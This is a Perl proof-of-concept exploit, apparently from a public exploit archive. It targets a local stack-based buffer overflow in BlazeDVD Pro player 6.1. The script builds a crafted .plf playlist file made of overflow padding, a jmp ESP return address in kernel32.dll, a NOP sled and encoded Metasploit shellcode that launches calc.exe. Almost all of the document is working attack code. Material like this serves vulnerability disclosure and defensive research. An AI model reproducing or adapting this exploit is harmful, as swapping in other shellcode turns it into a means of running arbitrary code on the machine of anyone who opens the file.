07/16/2013

BlazeDVD Pro player 6.1 - Stack Based Buffer Overflow (Direct Ret)

#!/usr/bin/perl

# BlazeDVD Pro player 6.1  Local stack based buffer overflow
# Author: PuN1sh3r
# Email: luiguibiker@gmail.com
# Date: Mon Jul 15 03:01:37 EDT 2013
# Vendor link: http://www.blazevideo.com/download.htmm
# Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro
# App Version: 6.1
# Tested on: Windows 2003 server sp1(EN)
# special thanks to corelanc0d3r for his amazing tutorials


$file = "blazeExpl.plf";
$junk = "\x41" x 260;
$eip = "\x33\xFE\xE4\x77"; #jmp ESP on kernel32.dll

#msf win/exec calc.exe [*] x86/alpha_mixed
$shellcode = "\x89\xe7\xda\xd4\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x49\x6c\x78\x68\x4d\x59\x67\x70\x77\x70" .
"\x43\x30\x65\x30\x6b\x39\x5a\x45\x76\x51\x59\x42\x52\x44" .
"\x6e\x6b\x71\x42\x46\x50\x6e\x6b\x56\x32\x36\x6c\x4e\x6b" .
"\x53\x62\x66\x74\x6c\x4b\x33\x42\x36\x48\x34\x4f\x6f\x47" .
"\x51\x5a\x75\x76\x75\x61\x39\x6f\x45\x61\x79\x50\x6c\x6c" .
"\x67\x4c\x70\x61\x53\x4c\x66\x62\x36\x4c\x57\x50\x5a\x61" .
"\x7a\x6f\x46\x6d\x63\x31\x5a\x67\x4a\x42\x4a\x50\x72\x72" .
"\x33\x67\x6c\x4b\x76\x32\x76\x70\x6c\x4b\x53\x72\x35\x6c" .
"\x46\x61\x4a\x70\x6e\x6b\x31\x50\x50\x78\x6b\x35\x39\x50" .
"\x54\x34\x62\x6a\x67\x71\x4e\x30\x30\x50\x6c\x4b\x52\x68" .
"\x35\x48\x6e\x6b\x70\x58\x51\x30\x43\x31\x6a\x73\x5a\x43" .
"\x55\x6c\x43\x79\x6c\x4b\x37\x44\x4c\x4b\x37\x71\x69\x46" .
"\x36\x51\x39\x6f\x46\x51\x4f\x30\x4e\x4c\x4f\x31\x5a\x6f" .
"\x64\x4d\x37\x71\x5a\x67\x46\x58\x79\x70\x43\x45\x4b\x44" .
"\x77\x73\x31\x6d\x4b\x48\x47\x4b\x51\x6d\x46\x44\x50\x75" .
"\x39\x72\x30\x58\x6c\x4b\x53\x68\x75\x74\x35\x51\x59\x43" .
"\x65\x36\x6c\x4b\x36\x6c\x52\x6b\x6e\x6b\x42\x78\x47\x6c" .
"\x63\x31\x48\x53\x6e\x6b\x63\x34\x4e\x6b\x56\x61\x7a\x70" .
"\x6c\x49\x73\x74\x34\x64\x56\x44\x63\x6b\x53\x6b\x43\x51" .
"\x61\x49\x43\x6a\x66\x31\x4b\x4f\x4b\x50\x31\x48\x71\x4f" .
"\x33\x6a\x6c\x4b\x32\x32\x48\x6b\x6e\x66\x31\x4d\x51\x7a" .
"\x76\x61\x6c\x4d\x6e\x65\x4f\x49\x37\x70\x67\x70\x63\x30" .
"\x72\x70\x70\x68\x44\x71\x4e\x6b\x32\x4f\x6b\x37\x39\x6f" .
"\x38\x55\x4f\x4b\x7a\x50\x6d\x65\x6c\x62\x70\x56\x55\x38" .
"\x6f\x56\x4d\x45\x6d\x6d\x6f\x6d\x39\x6f\x4b\x65\x55\x6c" .
"\x74\x46\x63\x4c\x55\x5a\x6d\x50\x49\x6b\x6b\x50\x64\x35" .
"\x67\x75\x6f\x4b\x72\x67\x57\x63\x71\x62\x62\x4f\x30\x6a" .
"\x57\x70\x36\x33\x69\x6f\x68\x55\x73\x53\x61\x71\x72\x4c" .
"\x30\x63\x44\x6e\x70\x65\x32\x58\x32\x45\x65\x50\x41\x41";
$junk .= $eip . "\x90" x 50 . $shellcode ;
###############################################################
open(FILE,">$file");
print FILE $junk;
close(FILE);
###############################################################